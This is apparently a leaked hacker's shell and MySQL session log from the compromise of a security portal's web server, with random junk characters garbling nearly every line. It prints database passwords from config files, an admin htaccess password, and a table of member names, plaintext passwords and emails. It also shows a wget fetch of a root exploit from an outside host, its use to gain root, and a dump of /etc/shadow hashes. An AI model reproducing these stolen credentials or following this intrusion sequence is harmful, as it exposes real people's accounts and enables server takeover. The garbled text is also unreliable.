. @8 g1 @) q; W4 i5 t1 q2 jdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql/ c3 R# [7 @$ z9 U" p" {0 x$ q
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com4 ? [7 p: X5 M! i
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
1 z9 w2 T5 H6 j6 c2 s Sdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
W: G! v5 S8 ]! T/ \3 n3 k-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg }: M9 {& j1 a8 v) m; s, q
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
1 }( u+ ?# g1 t3 e$ B' [; t; Adrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
3 J6 R) D9 W) z7 U8 n4 E7 Qdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd0 p+ x9 Q" M' V1 N/ h6 B
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php$ V: y7 w' B4 U" s9 k
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
1 q6 o( F3 x5 s0 r2 n1 f/ fdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed2 i! p& [# `$ P* b# W
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour* l* H* A; Q. ~" W+ f: m
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
# _3 x5 Y, A: f: d f-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
8 N% f# E- U) t; u6 P-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
$ z4 [6 X7 z0 A8 C, {9 S& Q-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html8 Q D! p# R( n) U4 i$ z$ R5 r
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
1 \8 T7 ^- Z) w. G& i* \% [7 e-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
) N' H$ `- g7 n0 i, C* z-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
- G+ Z- i" x/ odrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
! @9 p* j8 s& b, N: E$ }, P$ rdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
/ P7 K$ B2 i. V2 P; ^drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
' g3 x: V. P0 @7 V& n0 n: cdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log4 v% |9 _: s3 D( t
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member. R( W) s5 B2 o$ G6 ]. b4 C
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
2 Y% [! w" [$ Adrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
; i" Q# w' m, R-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
- e1 K" ?* E# C1 Pdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
9 ~7 |5 Y8 W: w$ n( T+ S-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt5 m: z0 ~- A! D! U1 S/ W
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss3 b* B. D& c5 n, B- [/ P* v1 t
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
{3 U5 Z7 I2 n3 ^4 l! G E1 Jdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com$ Z- v' ^0 I* \
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
# h; [4 G U& ?& h9 h+ O+ pdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
- z! R. N1 \8 j3 Adrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
7 F. |0 s& O5 j( F9 a( G3 `drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v29 F" r1 V; @" T3 R* o$ |
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
; f( B1 ]4 ~7 n+ `/ J4 }% n3 T, V-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
& f! c7 I9 ^2 U# N1 p: [drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki7 i2 B8 q @4 l+ U) g* @3 L# a
# ?% _0 |% _) K, j2 Zsh-3.2$ head -20 index.php5 X9 P$ I6 ^$ e& A% T
<?PHP7 e9 ]9 ~6 X' K# i: L/ N2 f, s
/**
' r; e- y9 O, x4 X/ P4 `: Q* M' W* Mainfile (external) for astalavistaNET v2.0) t& `& c1 v* i7 ]7 V
*
- z. Z& {# d8 n& l' w% n; [4 d1 A& o* @copyright Astalavista IT Engineering GmbH
/ a2 \9 G' _3 t; i9 M* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
/ \! m4 U: E; l$ J5 s" o* @version 1.0
5 h! ~3 F" q2 f7 L4 Q*/4 G7 B" y4 j$ b0 _: C/ e4 z: i
2 [, ^" @. N3 q- p4 x if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {4 r8 W h2 l+ W1 y+ U1 l; I% F
$dontStartSession = false;! c V, Q( B! \) l2 u% Z0 Y
} else {
, h# R/ f( q" b% W0 a0 M $dontStartSession = true;0 o7 T, N, }" z6 f4 ?$ S- n
} b5 a1 I4 W/ [2 g& y2 N0 w
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);% L. K7 J5 g/ H7 p2 i8 d( y% W
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
$ Y& V- |: y$ H1 F. r/ j require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);& M2 Q6 Q" W% U* o
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
1 b' k" H A! k- j/ n4 L+ K, g4 ^2 u' V- I
sh-3.2$ cd config: @8 H; ^- y) ^' K* U. c
sh-3.2$ ls -la9 g7 v0 `) s& L' k3 w
total 32
' G% `4 \: K, V5 u- L' E: rdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
7 q4 _3 x/ M) q1 Y$ y" Qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 j- ]3 {! H9 M* ?-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php0 J& P; l- r7 n5 G6 Z
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
" K% a& n, p4 L, a6 p- T/ x. ]-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
$ k" r5 C& H3 w-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php4 |. Y$ U" a/ [- j- Y
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php& u, `1 L3 l# V+ y
! g q7 K8 I3 k8 n1 S
sh-3.2$ cat com.conf.php) a/ |) k7 v6 H+ U/ ]" U* l
[snip]
9 k% l; D7 b9 H9 z% m W. C3 K//member-database
6 W5 @# G0 Q5 |$_CONFIG['db_mem_server'] = ‘localhost’;
' H& c9 U! O# |3 E1 a, q$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
, u* t+ r/ |1 P% W$_CONFIG['db_mem_user'] = ‘astanet_db’;8 d5 I7 h: I$ q! B a
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
- h# d) @7 E5 \& r$_CONFIG['db_mem_debug'] = false; //true or false. S+ r2 G* F1 Z* _: O" e2 d
//ads-database
! w; _. K1 q; A- j$_CONFIG['db_ads_server'] = ‘localhost’;0 z% w" f( N# H% O3 Q1 ^ E
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
# M4 }% F- I( s( ~& V8 t: S$_CONFIG['db_ads_user'] = ‘astanet_db’;
9 a/ `2 I( f# x) o A$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
7 X7 T2 w* ~0 U% @# D$_CONFIG['db_ads_debug'] = false; //true or false) c! r" i! m# l2 ~3 b! ~; _5 ]+ R
//rainbow-database5 T u5 ^! ]2 y7 \. }5 I9 K, U6 b5 v3 | A
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;( q% y5 b5 D/ n) w4 F
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
5 i2 ?2 M: S& J: D+ C h$_CONFIG['db_rainbow_user'] = ‘dinu’;! Z) q" a+ q9 `1 k
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
7 h' n2 E( |) ]3 [+ S$_CONFIG['db_rainbow_debug'] = false; //true or false
1 |4 z& p* l6 z) e3 k: p//mailing lists database) Y0 o3 E, R. n
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
0 q& r% n. a2 q p& H$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;9 K, l% m. W7 _/ E( |
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;- c# D4 y3 N S- n3 {. X
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’; P: r; ]/ K8 c! t
$_CONFIG['db_mailing_lists_debug'] = false; //true or false! W4 s, w6 y7 i& T! @0 ], ^+ B
//paypal
; m6 x! W* X9 _' v$ `! F$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
4 F& W# b& ]( n" _' f7 P# X/ Y$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
. d3 G" L0 N5 O7 V' r$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
$ z% M& B5 a1 h3 t$ i$_CONFIG['sub_pp_noship'] = ‘1′;
2 v7 s1 f6 v2 n6 S: T$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;, b3 i$ p) s( e
[snip]
1 A' b# W' |+ O. [: I5 D9 |! y
) e/ i* s/ N6 U t4 E7 v( tsh-3.2$ cd .. d. ?% {. B0 l& L& H
sh-3.2$ cd member
- M/ e$ r) ^4 X* x2 _sh-3.2$ ls -la
9 }' A5 Y8 \- d% R4 n D# [2 T# ototal 200 v9 @) |5 o" \2 V' u! v
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
0 {0 ?& W3 Z* vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..' |. W' g$ ]. O9 H
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
' ?& B2 a" c' i& R1 _% W4 t-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
$ ^* L2 J7 ]7 `; y+ fsh-3.2$ cat .htaccess% h) `6 y1 C9 e% M
SecFilterEngine off5 C5 o" q% D+ p. w
- c# E5 G" Z$ o4 w$ d( ~- B. g
sh-3.2$ cd ..
# M- b$ A+ R9 Y; u% H vsh-3.2$ cd cron
0 `1 W( d. X8 e. ]6 m$ Hsh-3.2$ ls -la* `5 S% B: `8 q7 p$ w
total 168+ K5 m- j/ Q) d0 k8 r
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 . ?; g1 `0 ^7 Y% b. k& B- g. A
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..2 C/ @4 m2 L5 g% N- P
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php9 x' P S: x# a/ h4 v, y" n5 l
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
# _# H, b! } B& Z& @9 s-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
5 G% a# y& [# H p0 ^0 j5 }% G-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php) H, C _* _5 F! y) u5 T
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php! V T* _9 l0 H5 L- b
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php+ D" [* f' J8 ~2 K7 ^5 r
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php- I. v$ `1 ?' Y+ c9 N1 h) a9 }
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php5 Z4 S3 n% O- l+ n3 B) V
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
# B- m& ?- u8 R* s! {* Z5 T/ d-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
# X7 Y+ G2 o& u/ @-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php8 }0 m/ H4 m6 c' [
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
0 l4 |# S8 Y" ]. A ~& A-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh( t. k5 _1 g0 F
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
/ a4 J' c2 G9 L-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
2 ~; Z4 G+ j4 C* @( Z-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
% [/ p/ c3 f- f7 m4 \" ?-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php3 N' P/ H: G4 |9 G7 q8 I
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php% n/ m3 p6 {( Q0 A) f
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
2 f+ K) u3 {, ^/ z9 a5 m% R-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php7 E1 @3 r5 d: r# x- ]
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php+ }8 Y; l% A3 Q+ x$ q5 |3 j- N/ D
7 |8 _8 f4 l U5 bsh-3.2$ cd ..
4 h% d0 ]8 A% \sh-3.2$ cd _007
3 E0 s7 M3 }* |1 x' X1 dsh-3.2$ ls -la, @( E! }- u" X% Q+ b& d6 Y
total 240 v& r( o. b2 i1 ^0 A9 C; k5 ^
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .# q! N1 C8 v9 F8 ]0 z3 w
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..& S& k0 @. p9 h
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess6 D' x. ?; d8 `) F
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
8 H- o6 x% d* f-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
6 H/ N' c/ z5 e9 C$ t) d5 T5 Q) d- Ydrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
- z* m4 E; o5 S. K# |) d/ P+ D: O; v \# {# \- f
sh-3.2$ cat .htaccess1 a" w) T0 V4 v- o5 G/ V- F8 b
authType Basic/ U$ C9 g8 v, K5 o9 A0 W0 K
authName Admin
" I: f J7 Q: xauthUserFile /home/astanet/auth/.htadm_pwd
6 T2 G2 t; Z3 z9 @& R) prequire valid-user
) S, M8 J, N7 C, h1 c4 {- a5 i$ i) b8 I! I! X- m6 u, y4 R* _. F
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
4 ~4 {, g5 U8 S* Fadmin2net:CR0bl65MwhfT
/ F; l* v4 }5 Y! n) {& i
' `& a& B2 b* }+ U. |sh-3.2$ mysql -u astanet_db -p& u4 _' L; G7 h
Enter password:# o2 v' k, e* F2 o! @6 a% L& V0 Y1 ~
Welcome to the MySQL monitor. Commands end with ; or \g.2 u. L6 h' i k6 A2 ?2 S. r
Your MySQL connection id is 275153& ?( g, p1 {0 e# l2 }* Z& i
Server version: 5.0.45-community-log MySQL Community Edition (GPL): i5 L- ~) v. w* ]2 T
) K Q* X+ U6 J& _1 R+ ]! W' V. @: ZType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- `) D5 |/ h: n! I/ s1 v1 K: g' ?8 G6 G5 M0 p+ X
mysql> show databases;! s6 i1 |9 u- c2 U- y* n5 \4 X
+———————–+% T, V, C- e" }2 R, b
| Database |
; J9 V+ b) t. x( N: v+ t+———————–+
; w- L# Y! Q- B- J- G( o k& y| information_schema |
- ^* x- X! O3 M3 u8 g| astanet_ads |
) x# v O4 [. c| astanet_mailing_lists |# A8 s8 x8 |8 Z- R6 J8 n
| astanet_mediawiki |+ I, f, l0 i$ j/ D4 i: I
| astanet_membersystem |
+ y& p( P$ o4 Q: P" T5 m0 Y| test |1 P( R) U: c( D! }7 d! M/ T
+———————–+
( e1 n5 d' K4 B) E3 Z6 rows in set (0.00 sec)# i) t! K3 ?6 Y& ]
- h* x1 ?2 k" \0 G
mysql> use astanet_membersystem
) a* A# g% H; v g4 V; X% qDatabase changed" u5 X; k1 d$ b! d0 F0 I
mysql> show tables;
& \: o0 Q1 T6 `+———————————–+0 I- Z, j7 v1 `8 f6 @. v, S
| Tables_in_astanet_membersystem |
$ Q& o1 ?0 f& x2 Y+———————————–+; Q) X: V ]5 m& E- X+ t! G' C9 `
| blacklist_categories |
$ W' Y2 a, Y2 p) X( {0 N* j| blacklist_content |% i+ R" t- d& r0 _8 q* M
| blacklist_levels |
9 K8 A1 S: ~% q+ C) V$ P- ]| blacklist_mcset |
- H2 c4 m8 Z( M# F( p| dir_categories |
: w0 m- T* r, `9 W2 ?| dir_comments |+ ?( o" C8 o# A! z! n
| dir_links |
/ r6 I, P' U2 ]; ]/ l% @| dir_temp |- k6 w6 H, x/ _
| dir_votes |# s8 V/ q r- d. Q" b. O
| documents |% \4 Q& v; G: `: R
| documents_categories |! S6 T, d+ v0 Z1 d7 t% d [/ g
| email_content |8 {) g0 m5 y5 q' T1 N6 \& E
| email_settings |' [" P; a* l. g
| exploits |1 [" n1 v7 T5 c9 e: w9 ]
| exploits_categories |
7 S% E& ~; K; }0 || exploittree_categories |* p. o, b5 w7 J* g$ `9 n8 q
| exploittree_exploits |8 Q) G' s$ ^, H* t
| home_values |( `9 f6 A+ A: O6 R
| iso_countries |
. A# V8 z+ O" q; z3 Z$ u2 a/ Y. i| links_categories |
5 c1 u: d- j& d, w% I, E3 {| links_records |( [. j1 [$ m* y0 }
| links_unauth |
, i, A( p5 w) @* [| links_votes |* o' C6 O, C3 A4 z8 n5 V
| log |
. @* n7 G: Q( H" A+ b0 O/ b| news_categories |6 b' o0 p4 w" \' f
| news_comments |
+ F; q7 J/ S5 G5 v; C| news_emoticons |; _" T( l; S- [# q
| news_latest |
; w3 Z0 [( s* y' l2 }| news_messages |/ S+ T" h" s( b
| news_statistics |
, N; _+ _. o* C" g" v. T| news_votes |
: c- W. g7 `4 B! H$ T| prices_content |/ a6 J$ }' H) _0 c: @
| prices_offers |
, u4 U6 _- k2 n: L% \$ ?* w| rss_settings |
+ {6 @8 G4 \+ H- y/ w0 q| sessions |$ k$ i% V, g0 u: z& o# V1 E
| stats_signups |5 V. _7 M& C' t7 P6 u% p
| u2u2 |
0 t% e6 V/ D9 D* q% |2 t; l' @| u2u_contact |
9 \1 `# f5 ?. l$ I| u2u_settings |
1 V* R0 B7 o+ A| user_keywords_selected_categories |
* k; G- }! W1 ?| users |& |. L7 b7 c y
| users_ipn_test |
4 X) B) [+ g+ D9 r4 F6 e$ a6 Y| users_keyword_values |
3 w' L$ P: ]4 R9 y, D| users_profile |' U! w9 y8 D+ A2 _% }
| users_temp |$ N/ @1 a9 E0 W( ?; [( A+ h
| users_upgrade |& f0 h/ ^. ]# m& l$ k n& l
+———————————–+* j8 Z# \/ H$ j% Q
46 rows in set (0.00 sec)( e& W- ?9 T7 l; e
# `& e1 q6 X) n+ B* V( K, [$ n
mysql> describe users;
# f! v8 I& a+ A3 d! I+————————–+————————————–+——+—–+———————+—————-+4 I! F3 q; p/ N7 P% y# M) B# C
| Field | Type | Null | Key | Default | Extra |
5 p0 V" w% l2 S+————————–+————————————–+——+—–+———————+—————-+/ H' I- X, N4 \5 k( T6 w
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
% ]2 S4 a+ \1 R| user | varchar(50) | NO | | | |4 {0 ?0 W. ]9 M' @3 K( [0 }! S0 Z7 f
| nickname | varchar(30) | NO | MUL | anonymous | |4 y# o; e4 a, q' j* w5 A% ~
| password | varchar(30) | NO | | | |4 w2 z! _8 Z. ]& Z
| userlevel | tinyint(3) | YES | MUL | NULL | |
* f' E+ x) w3 v; @+ X( t3 ~| exp | int(8) unsigned | NO | | 0 | |: C: a# P8 p; ^# V. m/ g T
| email | varchar(50) | NO | | | |
" @, K, o7 N+ R* X7 y+ L+ A| ip | varchar(15) | NO | | 0 | |- E2 w0 t$ k+ J A1 {) Z
| proxy | set(’0′,’1′) | NO | | 0 | |
. q0 q2 d! v( b: C8 ?6 o# Z| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |- a8 R0 \7 U/ s
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
& e* I& g& `9 A. g. u# a' n| anz_in | tinyint(1) | NO | | -1 | |7 Z. ?1 L' T. ?3 S. R4 h6 u% O
| status | tinyint(1) unsigned | NO | | 0 | |
8 s/ E q1 r3 o- ]5 p| checked | set(’0′,’1′,’2′) | NO | | 0 | |6 l* s; u4 J9 |) [+ c
| freemember | set(’0′,’1′) | NO | | 0 | |3 l$ {" K* x( d; y$ S
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
/ ~; A8 x+ {, a| lang | tinytext | NO | | | |
4 {1 g% z. @, F) b| adid | smallint(6) | NO | | 0 | |
) Y, s& m9 `! y% i: ^| pp_txn_id | varchar(255) | YES | | NULL | |8 q3 C* o7 X; Q1 S: @. X
| cnb_transaction_id | varchar(255) | YES | | NULL | |
/ ]% P' c, A8 ^6 B# W( }% H| cnb_order_id | varchar(255) | YES | | NULL | |" J9 [( N; i2 _! C
| cnb_user_id | int(11) | YES | | 0 | |+ W: Q: [/ N! m
+————————–+————————————–+——+—–+———————+—————-+* T0 V- ?* y$ @! v, g
22 rows in set (0.01 sec); H0 w: E x+ |2 \2 } H7 ~
/ B: m; d7 ~/ n5 F+ u4 o$ J9 [mysql> select count(*) as skids from users;: x- x' G- F1 D2 z% M( S5 T
+——-+
* Z, u, S/ d1 X/ U' l$ v" F+ }+ a| skids |& x( J) H5 b7 F2 |+ @
+——-+$ T, g: e* G" ]: D' [
| 25199 |9 K5 z: i2 U* F
+——-+
( q+ ^' l3 U6 ~7 x1 row in set (0.00 sec)
, i |& B e4 S
U. F# _) u3 u( u6 bmysql> select user,nickname,password,email from users where userlevel = 1;
8 d; n# }9 F$ e" `- h* i, i) K3 t: n+————————–+———————-+——————+———————————–+0 p* Y& n8 ^) \3 ?8 x$ @) a
| user | nickname | password | email |$ [; V1 X, K, ]6 ?: K! Q2 Z; J
+————————–+———————-+——————+———————————–+$ H! d' g0 H- j A
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |- o g+ E6 [/ ~& I9 c5 D" Z) N
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
7 h* [0 [( m8 r1 l( E2 m| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
5 @# o2 G; Z% @6 B5 L; \& K Z+ L| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |* P+ M' L; D! T8 i: F8 l: d1 g
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
+ n% G5 m+ [& s0 A| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
4 v2 C1 ~" e+ b) [ O; X| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |+ E, |+ u# q0 |- n' j
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
3 V! X. C! _$ `4 Q6 X| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
0 C1 M$ A$ }+ ]; R* t| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |! y, Q$ o( c) \) _% j
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |2 I5 A9 f+ \7 ~; c$ g/ X# d
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
& h- y+ Q. T, _7 t# N| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
+ m$ w$ ^; r1 q/ r' }| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
7 L( |. S$ q# [| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |+ a6 P7 B3 o* O2 O
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |) ]: z$ P6 F6 p' _# R
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |! v4 n3 C; p% P# f% b# q
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |. Q1 R& E7 ~5 h: M& P
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
3 C! j: x: F8 P8 I2 R1 `% U| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
( o9 f. J9 l, I# ]/ e0 N| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |' N/ M$ v' Q% M3 F& I2 r
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |( G9 c( A, C& l2 D5 A
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |) j# F f' J: }7 R( v
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |/ z" V" @ \7 y+ g1 Y% d
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |$ K: K& Y4 m0 F) G- D
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |. H& N$ ?, W: m+ A& ?
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
5 M2 E4 [+ P, T+————————–+———————-+——————+———————————–+% j, W% Y- {% ~2 D5 N9 G5 r
27 rows in set (0.00 sec)
3 I" o& v8 [5 e; B$ e# p. t$ ~8 L& T1 s
mysql> exit;
* t9 o1 V% f) v& D) \2 m4 a2 WBye/ m7 ^- _( r9 h7 M5 K: w# E6 ^
( s: t/ t( w' G( C, C
[~] plaintext passwords? yes,
5 Z4 x$ } f( x9 y9 ?6 sThose so called “security professionals” who charge you $6.66 / month to' U/ n8 w9 w. V4 ~. e, H8 ^. V
register at their hack-proof portal, save your passwords in plaintext…( L) i4 l$ w6 w
brilliant!. E! S, b+ N: Y0 e8 v6 m: g1 o
3 d6 k* ~7 [, t. L
[~] This been fun but we want more.6 }0 d% f. K1 n8 \' _# ]# g
8 k* y: y1 S& e$ I1 s
sh-3.2$ uname -a
' U: K1 ^8 M* t8 [% gLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux4 Y5 l& [2 H: S8 ^. L* s3 u
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
% y8 d' `, q" P1 U2 J+ w$ k–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]9 K W& m- g7 I7 ~
Resolving anti.sec.labs… 13.33.33.37# t7 T* c5 p7 P" n+ j/ u9 C9 C
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
2 {; _* d1 v2 a2 q6 zHTTP request sent, awaiting response… 200 OK
) ^& p0 @4 \, d6 y8 i5 |2 bLength: 18200 (18K) [text/plain]- _9 Y4 j8 x9 m5 r9 F! r" l
Saving to: `g0troot’, \8 Q9 K) \9 G5 ]
! q7 \ }4 a, w
100%[=========================================================================================================================================>] 18,200 58.6K/s in& H* A8 Y) g6 C. m$ \
0.3s& b0 d7 c( W, ?' j
1 J# e! o$ }% K% @$ p. |
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
$ g5 Z7 y4 ]+ U2 x0 z# m- R+ _4 p7 p/ f8 I- S
sh-3.2$ ./g0troot -i x86_64
; K$ d8 I; h( l9 D1 i, e# n[+] g0troot - anti.sec.labs7 x" ^0 T" K" k% z4 v4 u7 j
[+] Target: 2.6.18-128.1.10.el5
" w J2 S) ~! x3 h% h3 d[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
& W' e: w. H- Z# ], e
0 M9 {7 \: u) T( f, N& D$ [/ u[+] r00tr00t/ w4 N7 {$ ?; i6 K5 u: B% r! w
[~] Executing shell…: i& r6 E% E: x, W0 V
* D( b1 X7 L/ [( O; }/ k; l- G& t
sh-3.2# id& ^( s3 ?: H4 w4 v1 T2 X
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
4 N) D/ o; e$ r, q, B
' z. |2 R0 d% e* J7 Xsh-3.2# cat /etc/shadow& m2 }; ]3 ?% h: |& G( n1 E
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::+ h5 Z; T+ O7 d1 k P9 K! r
[snip]. g6 r- ~( }' N/ {8 ?3 K) H9 I6 w; a
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::' P0 i3 K) _7 ~! n2 T
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::& l# g! t% ]4 w5 T8 ^) n
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::* g. H4 R: w% ?, c3 P. ~' e
